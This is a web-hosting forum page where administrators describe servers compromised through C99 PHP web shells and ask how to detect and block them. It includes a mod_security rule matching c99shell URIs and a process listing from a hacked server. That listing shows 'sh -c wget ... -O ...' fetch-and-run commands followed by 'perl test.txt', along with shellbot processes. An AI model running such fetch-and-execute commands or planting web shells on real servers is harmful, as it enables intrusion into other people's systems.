C99Shell Hackers Killing Me!
guys im tired off fighting those hackers everyday! i have about 20 websites,and everyday i have one of them hacked! i restore a backup then another one hacked!
thats unbelivable!!!
those bastards upload there shell scripts to websites via bugs or whatever from php files!!
is there anyway to stop these commands?
can .htaccess helps? how?
i talked to my webhosting companies for my websites! ....
View Complete Thread with Replies
Sponsored Links:
Related Forum Messages:
C99Shell :: How To Detect Or Disable The Functionality Of C99Shell
Recently my site was defaced, (i own a dedicated server), my server was not touched, but one of the applications I used on the site was exploited to gain access to it. I have noticed 4 or 5 c99 shells in different locations on my ftp. The site is back online, but it's definitely possible that they have one of these hidden somewhere and that they'll just do it again. I am using cent os 5 How can I easily search for these on my box? Can I disable their functionality? is there setting I can use in htaccess or something to make my website safer? I visited one of the scripts, and it said SAFEMODE OFF, how can I at least enable safemode? I don't know much of anything about linux, but I am running cpanel and WHM. I have a guy who manages my box but he is hard to get a hold of sometimes, and I'd like to take care of this ASAP!
View Replies!
View Related
C99Shell Folders?
I found these folders in the root /usr/bin/c99 /usr/include/boost/numeric/interval/detail/c99_rounding_control.hpp /usr/include/boost/numeric/interval/detail/c99sub_rounding_control.hpp what are these ? is it normal folders ? or somebody hacked our server? what shall I do?
View Replies!
View Related
Trojan C99Shell
I just installed zen cart on my webhosting and after few days later i saw some file written like core1405.php and when i open to view the file it is actually trojan c99shell. I have deleted all of the core file. Now how can i prevent it from happen again? Cause it is too much work to clean up the hosting server.
View Replies!
View Related
Mod_security & C99shell Anyone Help Please ?
I installed modsecurity from Addone module in Cpanel When I try to apply phpshell woork good without a mistakes and I can do anything despite of the presence of protection modsecurity and disable_functions in php.ini. Is there a particular settings add to the httpd.conf to prevent application phpshell or prevent upload it to the site?
View Replies!
View Related
C99shell Disable PHP Scripts?
the biggest security issue i have with my clients is php c99 shell and similar php files, somehow these files uploaded on the website and from here they start attacking the websites. i have seen also that once you upload the c99 php file you are able to see the accounts information ( such as a user name ) on the same server so is there any way to disable this kind of php file or at least disable some function within the file! i have been thinking to install and run a antivirus on the server , but i see sometimes they upload the encrypted version of the file , so the antirus can't catch the file as a torjan!
View Replies!
View Related
C99Shell :: Attack Rules For Mod_security
i want to prevent c99shell scripts from running. I found this rule to detect URI's for the c99 shell. #new kit SecFilterSelective REQUEST_URI "/c99shell.txt" SecFilterSelective REQUEST_URI "/c99.txt?" My problem is that the hackers are being more stealthy and calling the script some random name like .../myphpstuff.php. So the URI no longer helps detect it. How could I detect "c99shell" in the actual file that apache servers? This assumes that the hacker was successfully in installing it. my box Apache 1.3.37 WHM 11.2.0 cPanel 11.11.0-R16983 FEDORA 5 i686 - WHM X v3.1.0
View Replies!
View Related
Layeredtech Killing Itself
I remember long time ago when I used to host on Layered Tech fast network good stuff, affordable price my first server costed me 90 dollars on Layered Tech with about 20 dollar setup one time fee. I visited today after about 2 years and I'm pretty much surprised to see their prices they are by no means affordable as they were previously and the setup fee is now 50 dollars on every server. With such large number of servers in their data centers shouldn't they be able to make them affordable? yet I have seen same server on WHT ads section for fraction of the price LT expects and not to mention the excessive setup fee. I'm not complaining, its their business, but is it really helping them? I cant be the only person feeling this anti-love for Layered Tech being a former LT customer, I had no problems with them or their services I just left after I sold my site and moved into VPS. But seeing the new prices its a bit shocking.
View Replies!
View Related
Gzip Is Killing My Server
from top: 12478 root 35 19 2004 680 308 R 39 0.0 8:54.95 gzip using anywhere from 30-50% of my cpu for nearly 10 min now. but, no memory usage. any ideas? should i kill the pid? site is running pretty slow as a result of this.
View Replies!
View Related
VPS RAM Is Killing
I have a VPS with 768Mb of RAM which was always suitable for the websites I'm hosting as most of them are not popular and none of them got high traffic recently at all But for over 2 days the vps is eating the ram and killing all the services (cpanel/httpd/ftp/MySQL..) I want to know what is causing this and stop it by any way I contacted my vps support and they told me to write "top" in the SSH but I didn't understand any thing from what I see and I didn't know what to do after writing that command .
View Replies!
View Related
Mysql Is Killing My Vps
the server load averges on my VPS have been very high - escalating to 6.5 in cases. The process causing this is: PidOwnerPriorityCpu %Mem %Command 7370 mysql -10 76.7 3.0 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/opal.ngwebservers.net.pid --skip-external-locking My VPS is hosted by Virpus Networks, and has spec: 512RAM (1024 burstable), 10GB hard drive space. 8 of these processors on node: Processor #1 Vendor: GenuineIntel Processor #1 Name: Intel(R) Xeon(TM) CPU 2.80GHz Processor #1 speed: 174.594 MHz Processor #1 cache size: 2048 KB No hardware or software changes were implemented on the VPS as far as I am aware. The MySQL process causing this is: 28993movies_mybblocalhostmovies_mybbQuery36Copying to tmp tableSELECT t.tid, t.dateline, p.edittime, t.subject, f.allowhtml, f.allowmycode, f.allowsmilies, f.allow This has been going on since I first saw the loads go high...
View Replies!
View Related
VRTServers.net Is KILLING Me
I have many servers on vrtservers.net and is happy of they support. And I planing be a reseller of them. But the nightmare come from last day.. My main server have got some SPAM report from spamcap.net [url] the spamcap.net report my server runing a open proxy.and somebody using it as SPAM. before the SPAM report.. I know this ISSUE and have fix it.. so the proxy just run many hours.[ check the mrtg graph.[url] sinse the SPAM report. vrtserver.net put this server offline.. I can Understand it. And I have contact the support@vrtservers.net Instantly. And I proceed the case of spamcap.net too. But the nightmare is .... When I ask "how to reconnect my servers/What time will the case close?" to VRTSERVERs.NET. the vrtservers.net reply to me said the server has been terminated and there is no way to get my data back. My god .. all of my server's data has been lost! vrtservers.net is killing me now!
View Replies!
View Related
Spamd Is Killing My VPS
I have a VPS with 320MB of RAM. The problem is that spammassassin is killing my VPS. Spamd service was using 50% of memory (+- 150MB of RAM). Do you think that this is normal RAM for Spamd?
View Replies!
View Related
Httpd Is Killing My Server
24 hours ago something wired happend.. For some reason httpd is causing high serverload. ATM : 22:44:17 up 22:17, 2 users, load average: 6.23, 6.12, 8.88 U Will keep gooing up and httpd need to be restartet when serverload comes up to 30. The traffic on the server is normal, no changes is made on the server.
View Replies!
View Related
Mod_security Killing Php
trying to get mod_security installed on my HSphere server, the install goes ok until i try and load rules? If i just load the exclude.conf rule then php sites work, if i also load rules.conf or any other rules then my php sites get 'connection refused error' ? I cannot find any thing in logs and there is no log written for mod_security? here is my modsecurity.conf Quote: #If you want to scan the output, uncomment these #SecFilterScanOutput On #SecFilterOutputMimeTypes "(null) text/html text/plain" # Accept almost all byte values SecFilterForceByteRange 1 255 # Server masking is optional #fake server banner - NOYB used - no one needs to know what we are using SecServerSignature "NOYB" #SecUploadDir /tmp #SecUploadKeepFiles Off # Only record the interesting stuff SecAuditEngine RelevantOnly SecAuditLog /var/log/audit_log # You normally won't need debug logging SecFilterDebugLevel 0 SecFilterDebugLog logs/modsec_debug_log #And now, the rules #Remove any of these Include lines you do not use or have rules for. #First, add in your exclusion rules: #These MUST come first! Include /etc/modsecurity/exclude.conf #Application protection rules #Include /etc/modsecurity/rules.conf bash-2.05b# cat /etc/modsecurity.conf <IfModule mod_security.c> # Only inspect dynamic requests # (YOU MUST TEST TO MAKE SURE IT WORKS AS EXPECTED) #SecFilterEngine DynamicOnly SecFilterEngine On # Reject requests with status 500 SecFilterDefaultAction "deny,log,status:500" # Some sane defaults SecFilterScanPOST On SecFilterCheckURLEncoding On SecFilterCheckCookieFormat On SecFilterCheckUnicodeEncoding Off SecFilterNormalizeCookies On # enable version 1 (RFC 2965) cookies SecFilterCookieFormat 1 SecServerResponseToken Off #If you want to scan the output, uncomment these #SecFilterScanOutput On #SecFilterOutputMimeTypes "(null) text/html text/plain" # Accept almost all byte values SecFilterForceByteRange 1 255 # Server masking is optional #fake server banner - NOYB used - no one needs to know what we are using SecServerSignature "NOYB" #SecUploadDir /tmp #SecUploadKeepFiles Off # Only record the interesting stuff SecAuditEngine RelevantOnly SecAuditLog /var/log/audit_log # You normally won't need debug logging SecFilterDebugLevel 0 SecFilterDebugLog logs/modsec_debug_log #And now, the rules #Remove any of these Include lines you do not use or have rules for. #First, add in your exclusion rules: #These MUST come first! Include /etc/modsecurity/exclude.conf #Application protection rules #Include /etc/modsecurity/rules.conf #Comment spam rules #Include /etc/modsecurity/blacklist.conf #Bad hosts, bad proxies and other bad players ##Include /etc/modsecurity/blacklist2.conf #Bad clients, known bogus useragents and other signs of malware ##Include /etc/modsecurity/useragents.conf #Known bad software, rootkits and other malware ##Include /etc/modsecurity/rootkits.conf #Signatures to prevent proxying through your server #only rule these rules if your server is NOT a proxy ##Include /etc/modsecurity/proxy.conf #Just in Time Patching for Vulnerable Applications ##Include /etc/modsecurity/jitp.conf #Google Hacks signatures ##Include /etc/modsecurity/recons.conf #Include /etc/modsecurity/ </IfModule>
View Replies!
View Related
Is CPanel Killing My VPS
I have a VPS with 256m guaranteed RAM .. and I have CPanel. A couple of days ago I got to fiddling with a database issue and had phpMyAdmin open for the better part of an hour. So I got to wondering what something like that does to my VPS? A secondary question .. same thing but on a dedicated server with 1g RAM?
View Replies!
View Related
Backups Killing My Server
Opt 248 3gb ram 250gb sata II I have a fairly unique problem. My server runs great 95% of the time. Loads average under 1. However backups have become a server killer. I use cpanel scheduled backup at early morning hours. The reason backups kill my server is that I have 300,000+ (and counting) images in a directory. They are all small pngs generated by LaTeX. It takes my server several hours to backup the images. I usually even have to stop apache to free up some power. This problem is only going to get worse as I get more images. Maybe I could upgrade proc or upgrade to faster HD? That would be costly, hopefully not. Should I hire a professional backup service? Costly, and would that help? Or is there a way of storing the images or doing the cpbackup I am doing wrong?
View Replies!
View Related
Iptables: Which One Of My Rules Is Killing Nslookup
One of these rules is causing name server lookups to fail, but I can't seem to figure out which one, can anyone spot the problem? Code: [root@example ~]# iptables -L -n Chain INPUT (policy DROP) target prot opt source destination ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 INVDROP all -- 0.0.0.0/0 0.0.0.0/0 state INVALID INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x00 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x3F INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x03/0x03 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x06 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x05/0x05 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x11/0x01 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x18/0x08 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x30/0x20 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:20 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:21 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:22 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:25 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:53 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:80 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:110 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:143 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:443 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:465 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:953 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:993 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:995 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:10023 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:20 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:21 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:953 ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 state NEW icmp type 8 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpt:53 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpts:1024:65535 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpts:1024:65535 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spts:1024:65535 dpt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spts:1024:65535 dpt:53 LOGDROPIN all -- 0.0.0.0/0 0.0.0.0/0 Chain FORWARD (policy DROP) target prot opt source destination Chain OUTPUT (policy DROP) target prot opt source destination INVDROP all -- 0.0.0.0/0 0.0.0.0/0 state INVALID INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x00 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x3F INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x03/0x03 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x06 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x05/0x05 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x11/0x01 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x18/0x08 INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x30/0x20 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:20 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:21 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:22 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:25 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:53 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:80 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:110 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:113 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:443 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:953 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:10023 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:9999 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:20 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:21 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:113 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:123 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:953 ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 state NEW icmp type 8 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpt:53 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spts:1024:65535 dpt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spts:1024:65535 dpt:53 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpts:1024:65535 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpts:1024:65535 LOGDROPOUT all -- 0.0.0.0/0 0.0.0.0/0 Chain INVDROP (18 references) target prot opt source destination DROP all -- 0.0.0.0/0 0.0.0.0/0 Chain LOGDROPIN (1 references) target prot opt source destination DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:67 DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:67 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:68 DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:68 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:111 DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:111 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:113 DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:113 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpts:135:139 DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpts:135:139 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:445 DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:445 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:513 DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:513 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:520 DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:520 LOG tcp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_IN Blocked* ' LOG udp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_IN Blocked* ' LOG icmp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_IN Blocked* ' DROP all -- 0.0.0.0/0 0.0.0.0/0 Chain LOGDROPOUT (1 references) target prot opt source destination LOG tcp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_OUT Blocked* ' LOG udp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_OUT Blocked* ' LOG icmp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_OUT Blocked* ' DROP all -- 0.0.0.0/0 0.0.0.0/0
View Replies!
View Related
Nobody_check Killing Spamd Process
My nobody_check is killing a process that seems to be o.k. but I'm not sure. The process is running /usr/bin/perl-bin which I never heard of. I thought it was /usr/bin/perl Should I be concerned? Again, I don't know what /perl-bin is. Process ID: 28457 has been killed Restuls for PID: 28457 total 0 dr-xr-xr-x 3 nobody nobody 0 Jul 23 17:00 . dr-xr-xr-x 201 root root 0 Jun 29 11:59 .. dr-xr-xr-x 2 root root 0 Jul 23 17:00 attr -r-------- 1 root root 0 Jul 23 17:00 auxv -r--r--r-- 1 root root 0 Jul 23 17:00 cmdline lrwxrwxrwx 1 root root 0 Jul 23 17:00 cwd -> / -r-------- 1 root root 0 Jul 23 17:00 environ lrwxrwxrwx 1 root root 0 Jul 23 17:00 exe -> /usr/bin/perl-bin dr-x------ 2 root root 0 Jul 23 17:00 fd -rw-r--r-- 1 root root 0 Jul 23 17:00 loginuid -r-------- 1 root root 0 Jul 23 17:00 maps -rw------- 1 root root 0 Jul 23 17:00 mem -r--r--r-- 1 root root 0 Jul 23 17:00 mounts lrwxrwxrwx 1 root root 0 Jul 23 17:00 root -> / -r--r--r-- 1 root root 0 Jul 23 17:00 stat -r--r--r-- 1 root root 0 Jul 23 17:00 statm -r--r--r-- 1 root root 0 Jul 23 17:00 status dr-xr-xr-x 3 root root 0 Jul 23 17:00 task -r--r--r-- 1 root root 0 Jul 23 17:00 wchan Netstat: tcp 0 0 127.0.0.1:783 127.0.0.1:40957 CLOSE_WAIT 28457/spamd child udp 0 0 xx.xxx.xxx.xx:41008 216.52.190.1:53 ESTABLISHED 28457/spamd child unix 3 [ ] STREAM CONNECTED 120878416 28457/spamd child unix 2 [ ] DGRAM 120872220 28457/spamd child unix 2 [ ] STREAM CONNECTED 120847759 28457/spamd child unix 2 [ ] STREAM CONNECTED 120832442 28457/spamd child Environ: Process ID: 23944 has been killed Restuls for PID: 23944 total 0 dr-xr-xr-x 3 nobody nobody 0 Jul 23 16:55 . dr-xr-xr-x 206 root root 0 Jun 29 11:59 .. dr-xr-xr-x 2 root root 0 Jul 23 17:00 attr -r-------- 1 root root 0 Jul 23 17:00 auxv -r--r--r-- 1 root root 0 Jul 23 16:55 cmdline lrwxrwxrwx 1 root root 0 Jul 23 17:00 cwd -> / -r-------- 1 root root 0 Jul 23 17:00 environ lrwxrwxrwx 1 root root 0 Jul 23 16:55 exe -> /usr/bin/perl-bin dr-x------ 2 root root 0 Jul 23 17:00 fd -rw-r--r-- 1 root root 0 Jul 23 17:00 loginuid -r-------- 1 root root 0 Jul 23 17:00 maps -rw------- 1 root root 0 Jul 23 17:00 mem -r--r--r-- 1 root root 0 Jul 23 17:00 mounts lrwxrwxrwx 1 root root 0 Jul 23 17:00 root -> / -r--r--r-- 1 root root 0 Jul 23 16:55 stat -r--r--r-- 1 root root 0 Jul 23 16:55 statm -r--r--r-- 1 root root 0 Jul 23 16:55 status dr-xr-xr-x 3 root root 0 Jul 23 17:00 task -r--r--r-- 1 root root 0 Jul 23 17:00 wchan Netstat: tcp 1 0 127.0.0.1:783 127.0.0.1:40955 CLOSE_WAIT 23944/spamd child udp 0 0 xx.xx.xxx.xxx:55606 216.52.190.1:53 ESTABLISHED 23944/spamd child unix 3 [ ] STREAM CONNECTED 120847760 23944/spamd child unix 2 [ ] STREAM CONNECTED 120832442 23944/spamd child unix 2 [ ] DGRAM 120677444 23944/spamd child Environ:
View Replies!
View Related
Hackers
I am constantly battling hackers over the last week and I have to admit I'm not really sure what it is that is letting them in, but they're getting in... the processes all run as "apache" so clearly it's the webserver somehow. I've changed the ssh port, have disabled cron on the apache user and have set php safe_mode on the site I think might be to blame, but still no luck. Logged in this morning to be greeted by this... Quote: [root@s15247463 httpdocs]# ps -fe | grep apache apache 2889 2220 1 Dec26 ? 00:18:36 /usr/sbin/httpd apache 2891 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd apache 2892 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd apache 2893 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd apache 2894 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd apache 2895 2220 0 Dec26 ? 00:00:05 /usr/sbin/httpd apache 2896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd apache 14664 2220 0 Dec26 ? 00:00:03 /usr/sbin/httpd apache 32714 1 0 Dec26 ? 00:00:02 /apache/bin/httpd apache 32719 1 0 Dec26 ? 00:00:02 /apache/bin/httpd apache 19751 2894 0 Dec26 ? 00:00:00 [sh] <defunct> apache 19764 1 23 Dec26 ? 03:31:35 shellbot apache 28642 2220 0 Dec26 ? 00:00:04 /usr/sbin/httpd apache 28662 2891 0 Dec26 ? 00:00:00 [sh] <defunct> apache 28666 1 22 Dec26 ? 03:23:10 shellbot apache 29532 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd apache 29933 2220 0 Dec26 ? 00:07:18 /usr/sbin/httpd apache 20833 2893 0 Dec26 ? 00:00:00 [sh] <defunct> apache 20838 1 13 Dec26 ? 01:21:35 [httpds] apache 20847 29532 0 Dec26 ? 00:00:00 [sh] <defunct> apache 20853 1 13 Dec26 ? 01:21:33 [httpds] apache 20870 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd apache 20879 2892 0 Dec26 ? 00:00:00 [sh] <defunct> apache 20884 1 13 Dec26 ? 01:21:28 [httpds] apache 20887 2896 0 Dec26 ? 00:00:00 [sh] <defunct> apache 20892 1 13 Dec26 ? 01:21:16 [httpds] apache 20895 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd apache 20896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd apache 20901 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd apache 21445 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd apache 1875 1 0 00:01 ? 00:00:00 [httpds] apache 2237 1 0 00:14 ? 00:00:00 ./mocks start apache 5465 20895 0 00:23 ? 00:00:00 [sh] <defunct> apache 5477 1 6 00:23 ? 00:24:48 shellbot apache 10110 14664 0 01:00 ? 00:00:00 [sh] <defunct> apache 10142 1 11 01:00 ? 00:44:09 shellbot apache 10537 2220 0 01:27 ? 00:00:01 /usr/sbin/httpd apache 13780 1 0 02:28 ? 00:00:00 [httpds] apache 13781 13780 0 02:28 ? 00:00:00 sh -c wget [url] -O [url] apache 13784 1 0 02:28 ? 00:00:00 [httpds] apache 13785 13784 0 02:28 ? 00:00:00 sh -c wget[url] -O [url] apache 13788 1 0 02:28 ? 00:00:00 [httpds] apache 13789 13788 0 02:28 ? 00:00:00 sh -c wget [url] -O [url] apache 13792 1 0 02:28 ? 00:00:00 [httpds] apache 13793 13792 0 02:28 ? 00:00:00 sh -c wget [url] -O [url] apache 13798 13789 0 02:29 ? 00:00:00 perl test.txt apache 13802 13781 0 02:29 ? 00:00:00 perl test.txt apache 13806 13793 0 02:29 ? 00:00:00 perl test.txt apache 13810 13785 0 02:29 ? 00:00:00 perl test.txt apache 22282 2220 0 03:40 ? 00:00:00 /usr/sbin/httpd apache 22434 20896 0 03:51 ? 00:00:00 [sh] <defunct> apache 22442 1 10 03:51 ? 00:20:33 [httpd] apache 22513 21445 0 03:55 ? 00:00:00 [perl] <defunct> apache 22515 1 0 03:55 ? 00:00:00 /usr/local/apache/bin/nscan -DSSL apache 22552 2220 0 03:58 ? 00:00:00 /usr/sbin/httpd apache 23183 1 0 04:03 ? 00:00:48 /usr/local/apache/bin/nscan -DSSL apache 23187 1 0 04:03 ? 00:00:47 /usr/local/apache/bin/nscan -DSSL apache 3606 2220 0 04:52 ? 00:00:00 /usr/sbin/httpd apache 27716 1 0 06:54 ? 00:00:00 [httpd] apache 27720 1 0 06:54 ? 00:00:00 ./php apache 28140 1 0 07:06 ? 00:00:00 /bin/sh ./mass 139 apache 28299 28140 0 07:12 ? 00:00:00 /bin/bash ./a 139.1 apache 28302 28299 9 07:12 ? 00:00:20 /bin/bash 139.1 22
View Replies!
View Related
Hackers
We are rookies and we are being attacked by hackers for the second time in as many weeks. I can see them in shell right now on multiple servers. I can not remember in all the excitement how to take away their root access. How do I stop them from doing any more damage?
View Replies!
View Related
GoDaddy Masking Is Killing My Site - Alternative?
So we've got a client setup with 2 domains; 1 main and 1 secondary. The secondary domain is a 301 redirect with masking through GoDaddy. The reason for the masking is because we need the domain name to stay the same after the redirect. (So people who come in on DomainB will only see DomainB in the url bar.) The problem: GoDaddy has uses a "zero frame" element to implement the masking and it's messing up the display of our site. Note: The display only screws up in IE. Primary domain: www.BristolCountyWomensJournal.com --> (This works fine.) 301 domain: www.WomensJournals.com --> (Check out the messy background!) Anyone know of alternatives to Domain Masking?
View Replies!
View Related
Determine What Cron Jobs Are Killing Server And When
We're running on Linux/Apache/MySQL/RoR and have a number of cron jobs that run throughout the day on our server. We've been noticing lately that at certain times of the day the site becomes really slow. When I'm online with my engineers I can mention this to them and they can check and see and say "Oh yeah, it's job XYZ that's spiking the server load." That's great but much of the time when I notice the sluggishness my developers are offline (we're in different time zones). I'm wondering if there's a fairly easy way to track this when they're not online so we can say "Yup, last night at 10 PM your time when you noticed that it was job ABC." There has to be something that allows you to do this right?
View Replies!
View Related
Hackers On My Server
Twice in about a week mabey 2 weeks my server provider has sent me spoof abuse messages on accounts on my server. These phising pages first linked to a bank then paypal, these phising pages that were placed were on 2 diffrent accounts and the accounts belong to people ive known for a very long time and they wouldnt have any idea how to do this so i know its a hacker getting in somhow. How can I stop this from happening? Any programs that I can run on the server? Heck even which log files do I check to see where these attacks are coming from would help as I could block the IP's . I'm running cpanel as well if that helps, i use CSF . I dont want to have to move servers as that would take a very long time for me.
View Replies!
View Related
Chinese Hackers
My PR4 site has been hacked by chinese hackers. They fortunately did not do anything exceptionally terrible, but the site was down, they altered the serps results and now my inbox ( operating from Squirelmail ) is now receiving even more spam than before. A network expert suggested that my server would now be being used for sending spam. And my company, who will remain nameless atm seem to claim that no server is safe from hackers under any circumstances. I would like to copy to you the companies response to my questions and I would hope for a word or two of inspiration and encouragement from you? The second string in each question is the server companies response. 1.Please quote me for checking to see if the server is being used for spam and blocking this from happening. We could certainly check and see if you server is currently sending out any spam and try to identify where it is originating from. Depending on the issue a fix may be required by your developers 2.Running a check on the sites code to see if there has been any amendments to the coding on the site We can check and see if there has been any FTP access and look at file modification dates, this would hopefully pick up and issues. 3.Making sure the server is safe and that all China ip ranges are banned. Whilst we cannot ban all Chinese ranges as we do not know all ranges China uses we can lock FTP and SSH access to certain ranges only, you would need to provide these ranges. 4.Applying a second level of security to stop a spammer from hacking the system ( However I am sure I already have anti virus and spy ware on the server ) I’m not sure you do have any anti-virus/spyware on your server, it is certainly not something we install. I don’t really believe either of those tools would stop someone hacking the server either, Linux server don’t really get affected by that. We could run a rootkit checker which checks for backdoors and modification of the operating system files. We would also suggest making sure the scripts are secure and any web interface (admin area) logins have secure passwords and are also IP restricted. For the work above we would charge 1 hour support at £150 per hour ex vat.
View Replies!
View Related
How Prevent Hackers Away
